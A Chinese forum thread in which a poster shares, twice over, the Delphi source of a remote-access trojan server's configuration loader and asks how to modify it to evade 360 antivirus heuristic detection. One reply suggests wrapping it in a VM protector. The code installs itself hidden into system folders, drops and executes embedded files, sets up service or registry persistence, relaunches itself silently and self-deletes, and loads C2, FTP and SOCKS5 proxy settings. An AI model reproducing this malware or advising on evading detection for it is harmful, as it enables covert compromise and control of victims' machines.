杀到这个地方了
{ TDRFServer.ReadMe
  Loads the configuration appended to the end of the running executable
  (paramstr(0)) into the Peizhi record. When the process is not running from
  its configured install path it also performs the install steps and halts.

  Trailer layout as read below (offsets counted from end of file):
    last 7 bytes      marker; JieMi(marker) must equal 'HGZVIP1'
    27 bytes before   Each_size, one length byte per configuration field
    len bytes before  concatenated field data, len = sum of the 27 lengths
  JieMi is defined elsewhere; presumably the decoding routine - confirm.

  Host artefacts produced by the install branch (useful for triage):
    - a copy of the executable at Setupname, marked SYSTEM + HIDDEN
    - value 'Beizhu' deleted under
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
      (the key is opened with CanCreate=true, so it is created if absent)
    - on NT, a service named Peizhi.WinServerName whose command line is
      Setupname + ' -NetSata'; otherwise InRegMe (defined elsewhere) is called
    - a hidden child process started as Setupname + ' -NetSata'
    - any embedded files written to TempPath and opened with ShellExecute

  NOTE(review) for anyone writing a config extractor: mirror the quirks in
  this parser exactly - Trim is applied to the blob before slicing, Str holds
  only 1000 chars although len can be larger, and the offset after field 22
  is advanced by each_size[23] instead of each_size[22]. }
procedure TDRFServer.ReadMe;
Var
Temp:string;
F:file;
Each_size:array [1..27] of char;
Str:array [1..1000] of char; Symbol:array [1..7] of char;
Setstr:string;
len,i:integer;
S:integer;
Count,b:integer;
J,JJ:integer; buf:array[0..4096] of byte;
fstream1:tfilestream;
fstream2:tfilestream;
info:FILE_INFO;
dir:string; Reg:TRegistry;
begin
try // poster's annotation: 360 signature
// Open our own image read-only (FileMode 0) with a record size of 1 byte.
Assignfile(F,paramstr(0));
FileMode :=0;
Reset(f,1);
// Read the 7-byte marker at the very end of the file and check it after decoding.
Seek(F,Filesize(f)-7);
BlockRead(F,Symbol,7);if JieMi(Symbol)='HGZVIP1' then
begin
// 34 = 27 length bytes + 7 marker bytes.
Seek(F,filesize(F)-34);
BlockRead(F,Each_size,27);
len:=0;
for i:=1 to 27 do len:=len+ord(each_size[i]);
Seek(f,filesize(F)-34-len);
// Space-fill so the unused tail is removed by Trim below.
for i:=1 to 1000 do str[i]:=' ';
// NOTE(review): len is not checked against the 1000-char size of Str.
blockread(F,Str,len);
// Field 1: install-path selector (integer). i tracks the 1-based offset of the next field.
// StrToInt calls outside an inner try fall through to the outer Except at the end.
Setstr:=Trim(str); Peizhi.SetupPath :=strtoint(JieMi(copy(Setstr,1,ord(each_size[1])))); {install path} i:=ord(each_size[1])+1; {install file name}
Peizhi.SetupFile:=JieMi(copy(setstr,i,ord(each_size[2]))); i:=i+ord(each_size[2]);
// Field 3: two '0'/'1' flag characters.
Temp:=JieMi(copy(setstr,i,ord(each_size[3])));
if Copy(Temp,1,1)='1' then Peizhi.AutoDelMe:=True; {self-delete}
if Copy(Temp,2,1)='1' then Peizhi.RunView:=True; {allow exit while running} i:=i+ord(each_size[3]); {startup entry}
// Field 4: two '0'/'1' flag characters selecting the persistence method.
Temp:=JieMi(copy(setstr,i,ord(each_size[4])));
if Copy(Temp,1,1)='1' then Peizhi.Regqidong:=True; {write registry startup entry}
if Copy(Temp,2,1)='1' then Peizhi.WinXpSer:=True; {write service entry}
i:=i+ord(each_size[4]); {display name}
Peizhi.WinServerView:=JieMi(copy(setstr,i,ord(each_size[5]))); i:=i+ord(each_size[5]); {service name}
Peizhi.WinServerName:=JieMi(copy(setstr,i,ord(each_size[6]))); i:=i+ord(each_size[6]); {description}
Peizhi.WinServerText:=JieMi(copy(setstr,i,ord(each_size[7]))); i:=i+ord(each_size[7]);
// Field 8: dialog flag, icon digit and button digit, one character each.
Temp:=JieMi(copy(setstr,i,ord(each_size[8])));
if Copy(Temp,1,1)='1' then Peizhi.MsgShow:=True; {whether to show a dialog}
Peizhi.TouBiao:=Strtoint(Copy(Temp,2,1)); {icon type}
Peizhi.NanNu:=strtoint(Copy(Temp,3,1)); {button type} i:=i+ord(each_size[8]); {dialog title}
Peizhi.BiaoTi:=JieMi(copy(setstr,i,ord(each_size[9]))); i:=i+ord(each_size[9]); {dialog body text}
Peizhi.NeiRong:=JieMi(copy(setstr,i,ord(each_size[10]))); i:=i+ord(each_size[10]); {size of the server before configuration}
// Field 11: offset in the image where embedded files start (0 = none).
// The selector then picks the install directory; Syspath, windowspath and
// Temppath are defined elsewhere.
Peizhi.SfileSize:=Strtoint(JieMi(copy(setstr,i,ord(each_size[11])))); case Peizhi.SetupPath of {install path}
0:Setupname:=Syspath+Peizhi.SetupFile;
1:Setupname:=windowspath+Peizhi.SetupFile;
2:Setupname:=Temppath+Peizhi.SetupFile;
end;
// Embedded-file extraction: each entry is a FILE_INFO record followed by
// info.len bytes of content. All errors in this section are swallowed.
try
if Peizhi.SfileSize<>0 then
begin
try
fstream1:=tfilestream.Create(paramstr(0),fmShareDenyRead);
fstream1.Seek(Peizhi.SfileSize,soFromBeginning);
while fstream1.Position<>fstream1.Size do
begin
fstream1.Read(info,sizeof(info));
count:=0;
// Not yet installed: drop into TempPath; otherwise next to the executable.
if (CompareText(paramstr(0),Setupname)<>0) then
dir:=TempPath+info.filename
else
dir:=ExtractFilePath(ParamStr(0))+info.filename;
// Clear attributes and remove an existing file of the same name.
if FileExists(dir) then
begin
FilesetAttr(dir,0);
DeleteFile(dir);
end;
// Still present (delete failed): fall back to a name from RandomFilename.
if FileExists(dir) then
dir:=RandomFilename(dir); assignfile(f,dir);
rewrite(f);
closefile(f);
fstream2:=tfilestream.Create(dir,fmopenwrite);
fstream2.Size:=0;
// Copy info.len bytes: whole buffers first, then the remainder.
j:=info.len div sizeof(buf);
for b:=1 to j do
begin
s:=fstream1.Read(buf,sizeof(buf));
fstream2.Write(buf,s);
inc(count,s);
end;
s:=fstream1.Read(buf,info.len-count);
fstream2.Write(buf,s);
fstream2.Free;
// Open the dropped file: always when info.isopen is set, otherwise only
// on the first (not yet installed) run. info.Por is passed as parameters.
if info.isopen<>0 then
begin
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end else begin {info.isopen=0}
if (CompareText(paramstr(0),Setupname)<>0) then
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end;
end; {while}
finally
fstream1.Free;
end;
end;
except
// Install branch: taken only when not already running from Setupname.
end; if (CompareText(paramstr(0),Setupname)<>0) then
begin
try
// Replace any previous copy; give up silently if it cannot be deleted.
if FileExists(Setupname) then
begin
FilesetAttr(Setupname,0);
DeleteFile(Setupname);
if FileExists(Setupname) then
begin
Halt(0);
Exit;
end;
end;
// Self-copy to the install path, then mark the copy SYSTEM + HIDDEN.
CopyFile(pchar(paramstr(0)),pchar(Setupname),False);
Setfileattributes(pchar(Setupname),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
except
end;
try
try
// Remove the 'Beizhu' value under HKLM ... \CurrentVersion\Setup.
reg:=Tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
reg.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Setup',true);
reg.DeleteValue('Beizhu');
Reg.CloseKey;
reg.Free;
except
// Persistence: a service on NT (only if WinXpSer is set), InRegMe otherwise.
end; if IsNT then
begin
if Peizhi.WinXpSer then
begin
try
DelService(Peizhi.WinServerName);
except
end;
Sleep(1000);
try
// Service command line carries the ' -NetSata' argument.
InstallService(Peizhi.WinServerName,Peizhi.WinServerView,Setupname+' -NetSata',Peizhi.WinServerText);
except
end;
end;
end
else
begin
InRegMe;
end;
{first install: show the prompt message}
if Peizhi.MsgShow then
begin
try
// Map the configured digits to MessageBox button and icon flags.
case Peizhi.NanNu of
0:j:=MB_OK;
1:j:=MB_OKCANCEL;
2:j:=MB_YESNO;
3:j:=MB_YESNOCANCEL;
4:j:=MB_RETRYCANCEL;
5:j:=MB_ABORTRETRYIGNORE;
end;
case Peizhi.TouBiao of
0:JJ:=mb_iconInformation;
1:JJ:=MB_ICONQUESTION ;
2:JJ:=mb_iconwarning;
3:JJ:=mb_iconerror;
end;
Forms.Application.MessageBox(pchar(Peizhi.NeiRong),pchar(Peizhi.BiaoTi),J+JJ+mb_topmost);
except
end;
end;
// Started without arguments: launch the installed copy hidden.
if paramstr(1)='' then
begin
Winexec(pchar(Setupname+' -NetSata'),SW_Hide);
end;
// Optional removal of the original file via DelMe (defined elsewhere).
if (Peizhi.AutoDelMe) and (paramstr(1)='') then
begin
DelMe;
end;
// The installer instance always terminates here.
Halt;
Exit;
except
Halt;
end;
Exit;
end;
// Reached only when already running from Setupname: parse fields 12..27.
i:=i+ord(each_size[11]);
Peizhi.Urlhttp:=JieMi(copy(setstr,i,ord(each_size[12]))); i:=i+ord(each_size[12]);
// Field 13 is split at ':' into Dnsym and Port - presumably host:port, confirm.
Temp:=JieMi(copy(setstr,i,ord(each_size[13])));
//
j:=pos(':',Temp);
if j>0 then
begin
try
// Port stays 80 when the text after ':' is not a number.
Peizhi.Port :=80;
Peizhi.Port :=StrtoInt(Copy(Temp,j+1,Length(Temp)));
except
end;
Peizhi.Dnsym:=Copy(Temp,1,j-1);
end
else
begin
Peizhi.Port :=80;
Peizhi.Dnsym:=Temp;
end; i:=i+ord(each_size[13]);
Peizhi.httpwj:=JieMi(copy(setstr,i,ord(each_size[14]))); i:=i+ord(each_size[14]);
Peizhi.PassWord:=JieMi(copy(setstr,i,ord(each_size[15]))); i:=i+ord(each_size[15]);
Peizhi.Group:=JieMi(copy(setstr,i,ord(each_size[16]))); i:=i+ord(each_size[16]);
try
Peizhi.ClientIm:=Strtoint(JieMi(copy(setstr,i,ord(each_size[17]))));
except
// Falls back to 25 when the field is not numeric.
Peizhi.ClientIm:=25;
end; i:=i+ord(each_size[17]);
Peizhi.Beizhu:=JieMi(copy(setstr,i,ord(each_size[18])));
i:=i+ord(each_size[18]);
// Field 19: any value other than '0' sets OpenFtpS.
Temp:=JieMi(copy(setstr,i,ord(each_size[19])));
if Temp<>'0' then Peizhi.OpenFtpS:=True; i:=i+ord(each_size[19]);
Peizhi.FtpPort:=JieMi(copy(setstr,i,ord(each_size[20]))); i:=i+ord(each_size[20]);
Peizhi.Ftpuser:=JieMi(copy(setstr,i,ord(each_size[21]))); i:=i+ord(each_size[21]);
// NOTE(review): the offset is advanced by each_size[23], not each_size[22],
// and field 23 itself is never read - looks like an index slip; confirm.
Peizhi.Ftppass:=JieMi(copy(setstr,i,ord(each_size[22]))); i:=i+ord(each_size[23]);
// Field 24: any value other than '0' sets OpenSocks5.
Temp:=JieMi(copy(setstr,i,ord(each_size[24])));
if Temp<>'0' then Peizhi.OpenSocks5:=True; i:=i+ord(each_size[24]);
try
Peizhi.Socks5Port:=Strtoint(JieMi(copy(setstr,i,ord(each_size[25]))));
except
// Falls back to 1080 when the field is not numeric.
Peizhi.Socks5Port:=1080;
end; i:=i+ord(each_size[25]);
Peizhi.Socks5user:=JieMi(copy(setstr,i,ord(each_size[26])));
i:=i+ord(each_size[26]);
Peizhi.Socks5pass:=JieMi(copy(setstr,i,ord(each_size[27]))); end
else
begin
// Marker mismatch: clear Urlhttp and tag the group (string reads
// "misconfigured host").
Peizhi.Urlhttp:='';
Peizhi.Group:='配置出错主机';
end;
try
Closefile(f);
except
end;
Except
// Any unhandled error above: clear Urlhttp and tag the group (string reads
// "config read error host").
Peizhi.Urlhttp:='';
Peizhi.Group:='读取配置出错主机';
end;
end;不知道怎么改了 ,看别的帖子说的高启发查杀是查杀两个地方,不知道怎么找另一个地方了,稍微取消一段代码注释就被杀了,有懂的大哥帮帮,不懂的帮忙顶顶贴,谢谢各位了,本人第一次发帖。
{ TDRFServer.ReadMe
  Loads the configuration appended to the end of the running executable
  (paramstr(0)) into the Peizhi record. When the process is not running from
  its configured install path it also performs the install steps and halts.

  Trailer layout as read below (offsets counted from end of file):
    last 7 bytes      marker; JieMi(marker) must equal 'HGZVIP1'
    27 bytes before   Each_size, one length byte per configuration field
    len bytes before  concatenated field data, len = sum of the 27 lengths
  JieMi is defined elsewhere; presumably the decoding routine - confirm.

  Host artefacts produced by the install branch (useful for triage):
    - a copy of the executable at Setupname, marked SYSTEM + HIDDEN
    - value 'Beizhu' deleted under
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
      (the key is opened with CanCreate=true, so it is created if absent)
    - on NT, a service named Peizhi.WinServerName whose command line is
      Setupname + ' -NetSata'; otherwise InRegMe (defined elsewhere) is called
    - a hidden child process started as Setupname + ' -NetSata'
    - any embedded files written to TempPath and opened with ShellExecute

  NOTE(review) for anyone writing a config extractor: mirror the quirks in
  this parser exactly - Trim is applied to the blob before slicing, Str holds
  only 1000 chars although len can be larger, and the offset after field 22
  is advanced by each_size[23] instead of each_size[22]. }
procedure TDRFServer.ReadMe;
Var
Temp:string;
F:file;
Each_size:array [1..27] of char;
Str:array [1..1000] of char; Symbol:array [1..7] of char;
Setstr:string;
len,i:integer;
S:integer;
Count,b:integer;
J,JJ:integer; buf:array[0..4096] of byte;
fstream1:tfilestream;
fstream2:tfilestream;
info:FILE_INFO;
dir:string; Reg:TRegistry;
begin
try // poster's annotation: 360 signature
// Open our own image read-only (FileMode 0) with a record size of 1 byte.
Assignfile(F,paramstr(0));
FileMode :=0;
Reset(f,1);
// Read the 7-byte marker at the very end of the file and check it after decoding.
Seek(F,Filesize(f)-7);
BlockRead(F,Symbol,7);if JieMi(Symbol)='HGZVIP1' then
begin
// 34 = 27 length bytes + 7 marker bytes.
Seek(F,filesize(F)-34);
BlockRead(F,Each_size,27);
len:=0;
for i:=1 to 27 do len:=len+ord(each_size[i]);
Seek(f,filesize(F)-34-len);
// Space-fill so the unused tail is removed by Trim below.
for i:=1 to 1000 do str[i]:=' ';
// NOTE(review): len is not checked against the 1000-char size of Str.
blockread(F,Str,len);
// Field 1: install-path selector (integer). i tracks the 1-based offset of the next field.
// StrToInt calls outside an inner try fall through to the outer Except at the end.
Setstr:=Trim(str); Peizhi.SetupPath :=strtoint(JieMi(copy(Setstr,1,ord(each_size[1])))); {install path} i:=ord(each_size[1])+1; {install file name}
Peizhi.SetupFile:=JieMi(copy(setstr,i,ord(each_size[2]))); i:=i+ord(each_size[2]);
// Field 3: two '0'/'1' flag characters.
Temp:=JieMi(copy(setstr,i,ord(each_size[3])));
if Copy(Temp,1,1)='1' then Peizhi.AutoDelMe:=True; {self-delete}
if Copy(Temp,2,1)='1' then Peizhi.RunView:=True; {allow exit while running} i:=i+ord(each_size[3]); {startup entry}
// Field 4: two '0'/'1' flag characters selecting the persistence method.
Temp:=JieMi(copy(setstr,i,ord(each_size[4])));
if Copy(Temp,1,1)='1' then Peizhi.Regqidong:=True; {write registry startup entry}
if Copy(Temp,2,1)='1' then Peizhi.WinXpSer:=True; {write service entry}
i:=i+ord(each_size[4]); {display name}
Peizhi.WinServerView:=JieMi(copy(setstr,i,ord(each_size[5]))); i:=i+ord(each_size[5]); {service name}
Peizhi.WinServerName:=JieMi(copy(setstr,i,ord(each_size[6]))); i:=i+ord(each_size[6]); {description}
Peizhi.WinServerText:=JieMi(copy(setstr,i,ord(each_size[7]))); i:=i+ord(each_size[7]);
// Field 8: dialog flag, icon digit and button digit, one character each.
Temp:=JieMi(copy(setstr,i,ord(each_size[8])));
if Copy(Temp,1,1)='1' then Peizhi.MsgShow:=True; {whether to show a dialog}
Peizhi.TouBiao:=Strtoint(Copy(Temp,2,1)); {icon type}
Peizhi.NanNu:=strtoint(Copy(Temp,3,1)); {button type} i:=i+ord(each_size[8]); {dialog title}
Peizhi.BiaoTi:=JieMi(copy(setstr,i,ord(each_size[9]))); i:=i+ord(each_size[9]); {dialog body text}
Peizhi.NeiRong:=JieMi(copy(setstr,i,ord(each_size[10]))); i:=i+ord(each_size[10]); {size of the server before configuration}
// Field 11: offset in the image where embedded files start (0 = none).
// The selector then picks the install directory; Syspath, windowspath and
// Temppath are defined elsewhere.
Peizhi.SfileSize:=Strtoint(JieMi(copy(setstr,i,ord(each_size[11])))); case Peizhi.SetupPath of {install path}
0:Setupname:=Syspath+Peizhi.SetupFile;
1:Setupname:=windowspath+Peizhi.SetupFile;
2:Setupname:=Temppath+Peizhi.SetupFile;
end;
// Embedded-file extraction: each entry is a FILE_INFO record followed by
// info.len bytes of content. All errors in this section are swallowed.
try
if Peizhi.SfileSize<>0 then
begin
try
fstream1:=tfilestream.Create(paramstr(0),fmShareDenyRead);
fstream1.Seek(Peizhi.SfileSize,soFromBeginning);
while fstream1.Position<>fstream1.Size do
begin
fstream1.Read(info,sizeof(info));
count:=0;
// Not yet installed: drop into TempPath; otherwise next to the executable.
if (CompareText(paramstr(0),Setupname)<>0) then
dir:=TempPath+info.filename
else
dir:=ExtractFilePath(ParamStr(0))+info.filename;
// Clear attributes and remove an existing file of the same name.
if FileExists(dir) then
begin
FilesetAttr(dir,0);
DeleteFile(dir);
end;
// Still present (delete failed): fall back to a name from RandomFilename.
if FileExists(dir) then
dir:=RandomFilename(dir); assignfile(f,dir);
rewrite(f);
closefile(f);
fstream2:=tfilestream.Create(dir,fmopenwrite);
fstream2.Size:=0;
// Copy info.len bytes: whole buffers first, then the remainder.
j:=info.len div sizeof(buf);
for b:=1 to j do
begin
s:=fstream1.Read(buf,sizeof(buf));
fstream2.Write(buf,s);
inc(count,s);
end;
s:=fstream1.Read(buf,info.len-count);
fstream2.Write(buf,s);
fstream2.Free;
// Open the dropped file: always when info.isopen is set, otherwise only
// on the first (not yet installed) run. info.Por is passed as parameters.
if info.isopen<>0 then
begin
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end else begin {info.isopen=0}
if (CompareText(paramstr(0),Setupname)<>0) then
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end;
end; {while}
finally
fstream1.Free;
end;
end;
except
// Install branch: taken only when not already running from Setupname.
end; if (CompareText(paramstr(0),Setupname)<>0) then
begin
try
// Replace any previous copy; give up silently if it cannot be deleted.
if FileExists(Setupname) then
begin
FilesetAttr(Setupname,0);
DeleteFile(Setupname);
if FileExists(Setupname) then
begin
Halt(0);
Exit;
end;
end;
// Self-copy to the install path, then mark the copy SYSTEM + HIDDEN.
CopyFile(pchar(paramstr(0)),pchar(Setupname),False);
Setfileattributes(pchar(Setupname),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
except
end;
try
try
// Remove the 'Beizhu' value under HKLM ... \CurrentVersion\Setup.
reg:=Tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
reg.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Setup',true);
reg.DeleteValue('Beizhu');
Reg.CloseKey;
reg.Free;
except
// Persistence: a service on NT (only if WinXpSer is set), InRegMe otherwise.
end; if IsNT then
begin
if Peizhi.WinXpSer then
begin
try
DelService(Peizhi.WinServerName);
except
end;
Sleep(1000);
try
// Service command line carries the ' -NetSata' argument.
InstallService(Peizhi.WinServerName,Peizhi.WinServerView,Setupname+' -NetSata',Peizhi.WinServerText);
except
end;
end;
end
else
begin
InRegMe;
end;
{first install: show the prompt message}
if Peizhi.MsgShow then
begin
try
// Map the configured digits to MessageBox button and icon flags.
case Peizhi.NanNu of
0:j:=MB_OK;
1:j:=MB_OKCANCEL;
2:j:=MB_YESNO;
3:j:=MB_YESNOCANCEL;
4:j:=MB_RETRYCANCEL;
5:j:=MB_ABORTRETRYIGNORE;
end;
case Peizhi.TouBiao of
0:JJ:=mb_iconInformation;
1:JJ:=MB_ICONQUESTION ;
2:JJ:=mb_iconwarning;
3:JJ:=mb_iconerror;
end;
Forms.Application.MessageBox(pchar(Peizhi.NeiRong),pchar(Peizhi.BiaoTi),J+JJ+mb_topmost);
except
end;
end;
// Started without arguments: launch the installed copy hidden.
if paramstr(1)='' then
begin
Winexec(pchar(Setupname+' -NetSata'),SW_Hide);
end;
// Optional removal of the original file via DelMe (defined elsewhere).
if (Peizhi.AutoDelMe) and (paramstr(1)='') then
begin
DelMe;
end;
// The installer instance always terminates here.
Halt;
Exit;
except
Halt;
end;
Exit;
end;
// Reached only when already running from Setupname: parse fields 12..27.
i:=i+ord(each_size[11]);
Peizhi.Urlhttp:=JieMi(copy(setstr,i,ord(each_size[12]))); i:=i+ord(each_size[12]);
// Field 13 is split at ':' into Dnsym and Port - presumably host:port, confirm.
Temp:=JieMi(copy(setstr,i,ord(each_size[13])));
//
j:=pos(':',Temp);
if j>0 then
begin
try
// Port stays 80 when the text after ':' is not a number.
Peizhi.Port :=80;
Peizhi.Port :=StrtoInt(Copy(Temp,j+1,Length(Temp)));
except
end;
Peizhi.Dnsym:=Copy(Temp,1,j-1);
end
else
begin
Peizhi.Port :=80;
Peizhi.Dnsym:=Temp;
end; i:=i+ord(each_size[13]);
Peizhi.httpwj:=JieMi(copy(setstr,i,ord(each_size[14]))); i:=i+ord(each_size[14]);
Peizhi.PassWord:=JieMi(copy(setstr,i,ord(each_size[15]))); i:=i+ord(each_size[15]);
Peizhi.Group:=JieMi(copy(setstr,i,ord(each_size[16]))); i:=i+ord(each_size[16]);
try
Peizhi.ClientIm:=Strtoint(JieMi(copy(setstr,i,ord(each_size[17]))));
except
// Falls back to 25 when the field is not numeric.
Peizhi.ClientIm:=25;
end; i:=i+ord(each_size[17]);
Peizhi.Beizhu:=JieMi(copy(setstr,i,ord(each_size[18])));
i:=i+ord(each_size[18]);
// Field 19: any value other than '0' sets OpenFtpS.
Temp:=JieMi(copy(setstr,i,ord(each_size[19])));
if Temp<>'0' then Peizhi.OpenFtpS:=True; i:=i+ord(each_size[19]);
Peizhi.FtpPort:=JieMi(copy(setstr,i,ord(each_size[20]))); i:=i+ord(each_size[20]);
Peizhi.Ftpuser:=JieMi(copy(setstr,i,ord(each_size[21]))); i:=i+ord(each_size[21]);
// NOTE(review): the offset is advanced by each_size[23], not each_size[22],
// and field 23 itself is never read - looks like an index slip; confirm.
Peizhi.Ftppass:=JieMi(copy(setstr,i,ord(each_size[22]))); i:=i+ord(each_size[23]);
// Field 24: any value other than '0' sets OpenSocks5.
Temp:=JieMi(copy(setstr,i,ord(each_size[24])));
if Temp<>'0' then Peizhi.OpenSocks5:=True; i:=i+ord(each_size[24]);
try
Peizhi.Socks5Port:=Strtoint(JieMi(copy(setstr,i,ord(each_size[25]))));
except
// Falls back to 1080 when the field is not numeric.
Peizhi.Socks5Port:=1080;
end; i:=i+ord(each_size[25]);
Peizhi.Socks5user:=JieMi(copy(setstr,i,ord(each_size[26])));
i:=i+ord(each_size[26]);
Peizhi.Socks5pass:=JieMi(copy(setstr,i,ord(each_size[27]))); end
else
begin
// Marker mismatch: clear Urlhttp and tag the group (string reads
// "misconfigured host").
Peizhi.Urlhttp:='';
Peizhi.Group:='配置出错主机';
end;
try
Closefile(f);
except
end;
Except
// Any unhandled error above: clear Urlhttp and tag the group (string reads
// "config read error host").
Peizhi.Urlhttp:='';
Peizhi.Group:='读取配置出错主机';
end;
end;不知道怎么改了 ,看别的帖子说的高启发查杀是查杀两个地方,不知道怎么找另一个地方了,稍微取消一段代码注释就被杀了,有懂的大哥帮帮,不懂的帮忙顶顶贴,谢谢各位了,本人第一次发帖。
你可以找个vm 壳 用sdk试试